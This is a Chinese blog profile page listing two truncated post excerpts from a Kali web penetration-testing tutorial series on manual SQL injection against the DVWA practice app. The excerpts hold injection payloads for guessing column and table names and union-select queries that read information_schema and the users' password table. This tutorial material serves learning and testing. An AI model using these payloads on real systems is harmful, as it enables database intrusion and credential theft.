- 博客(2)
- 资源 (2)
- 收藏
- 关注
原创 【Kali Web渗透测试】手动漏洞挖掘—SQL注入 猜测数据库列名、表名、库名、字段内容
1. 列名、表名、库名' and user is null--+' and table.user is null--+' and db.table.user is null--+用burp截获http GET请求,发送到repeater,变量加$, load字典(字典可从kali中获取(find / -name *column*.txt))' and (select count(*) from t...
2018-04-12 16:49:13
3461
原创 【Kali Web渗透测试】手动漏洞挖掘——复杂语句查询&读写文件和下载数据库
1. 复杂语句查询' union select //闭合前面的分号,联合查询' union select table_name,table_schema from information_schema.tables--+ // --注释符 +空格' union select user,password from dvwa.users--+ //查询user、password...
2018-04-11 20:31:40
211
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人